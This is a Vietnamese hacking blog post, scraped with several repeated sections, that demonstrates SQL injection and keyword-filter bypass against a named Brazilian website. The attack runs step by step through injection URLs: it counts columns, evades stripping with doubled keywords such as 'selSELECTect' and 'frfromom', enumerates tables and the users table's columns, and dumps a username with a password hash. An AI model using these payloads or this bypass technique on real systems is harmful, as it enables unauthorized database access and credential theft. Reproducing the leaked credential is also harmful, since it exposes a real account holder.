Hacking-Security-Coding-UG

Unknown

Phần đầu mình lấy của Judon trong vhb

Phần 1

Victim http://www.instintocigano.com.br/

Check sqli : http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131%27

Báo lỗi

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3

Thực hiện lệnh order by tìm cột lỗi

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 9-- // ko lỗi nhé

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 10-- // báo lỗi Unknown column '10' in 'order clause'

=>> có 10 cột từ 0-9

Bây giờ thực hiện union select thôi :D

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union select 1,2,3,4,5,6,7,8,9-- // báo lỗi Comando SQL:
**SELECT * FROM artigos WHERE id = null union 1,2,3,4,5,6,7,8,9**

không thấy chữ select đâu,dự là bị thịt mất rồi,nên ta thay bằng câu lệnh sau :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union selselectect 1,2,3,4,5,6,7,8,9--

( thay select= selsellectect,seselectlect…,khi chữ select bị tô đậm bị thịt mất,thì vẫn còn 1 chữ select )

Cau lệnh đúng =>> có 3 cột lỗi là 4,5,7

Tìm table :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130 UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—

// lại bị thịt mất từ FROM và WHERE

Nhưng k sao,vẫn áp dụng cách trên ta có :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 frfromom information_schema.tables whwhereere table_schema=database()—

Xuất hiện 1 đống các table

artigos,artigos_categoria,artigos_comentario,carta_dia,contato,depoimentos,duvidas,indique,links,links_categoria,usuarios

usuarios chắc là bảng user đây

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(column_name),5,6,7,8,9 frfromom information_schema.columns whwhereere table_name=0x7573756172696f73—

id,nome,email,login,senha,tipo

nome là name,còn senha là pass :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(nome,0x3a,senha),5,6,7,8,9 frfromom usuarios—

roselaura: e71aec8b8e27a13ed30128d39a8d01e0

Hacking-Security-Coding-UG

Trang

Thứ Hai, 14 tháng 1, 2013

Một số cách bypass sqli

Phần 1

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 10-- // báo lỗi Unknown column '10' in 'order clause'

=>> có 10 cột từ 0-9

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union select 1,2,3,4,5,6,7,8,9-- // báo lỗi Comando SQL:
**SELECT * FROM artigos WHERE id = null union 1,2,3,4,5,6,7,8,9**

không thấy chữ select đâu,dự là bị thịt mất rồi,nên ta thay bằng câu lệnh sau :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union selselectect 1,2,3,4,5,6,7,8,9--

( thay select= selsellectect,seselectlect…,khi chữ select bị tô đậm bị thịt mất,thì vẫn còn 1 chữ select )

Cau lệnh đúng =>> có 3 cột lỗi là 4,5,7

Tìm table :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130 UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—

// lại bị thịt mất từ FROM và WHERE

Nhưng k sao,vẫn áp dụng cách trên ta có :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 frfromom information_schema.tables whwhereere table_schema=database()—

Xuất hiện 1 đống các table

artigos,artigos_categoria,artigos_comentario,carta_dia,contato,depoimentos,duvidas,indique,links,links_categoria,usuarios

id,nome,email,login,senha,tipo

roselaura: e71aec8b8e27a13ed30128d39a8d01e0

Phần 2:từ từ viết :))

Không có nhận xét nào:

Đăng nhận xét

Trang

Thứ Hai, 14 tháng 1, 2013

Một số cách bypass sqli

Phần 1

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=131 order by 10-- // báo lỗi Unknown column '10' in 'order clause'

=>> có 10 cột từ 0-9

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union select 1,2,3,4,5,6,7,8,9-- // báo lỗi Comando SQL: SELECT * FROM artigos WHERE id = null union 1,2,3,4,5,6,7,8,9

không thấy chữ select đâu,dự là bị thịt mất rồi,nên ta thay bằng câu lệnh sau :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union selselectect 1,2,3,4,5,6,7,8,9--

( thay select= selsellectect,seselectlect…,khi chữ select bị tô đậm bị thịt mất,thì vẫn còn 1 chữ select )

Cau lệnh đúng =>> có 3 cột lỗi là 4,5,7

Tìm table :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-130 UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—

// lại bị thịt mất từ FROM và WHERE

Nhưng k sao,vẫn áp dụng cách trên ta có :

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null UNION selSELECTect 1,2,3,group_concat(table_name),5,6,7,8,9 frfromom information_schema.tables whwhereere table_schema=database()—

Xuất hiện 1 đống các table

artigos,artigos_categoria,artigos_comentario,carta_dia,contato,depoimentos,duvidas,indique,links,links_categoria,usuarios

id,nome,email,login,senha,tipo

roselaura: e71aec8b8e27a13ed30128d39a8d01e0

Phần 2:từ từ viết :))

Không có nhận xét nào:

Đăng nhận xét

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=null union select 1,2,3,4,5,6,7,8,9-- // báo lỗi Comando SQL:
**SELECT * FROM artigos WHERE id = null union 1,2,3,4,5,6,7,8,9**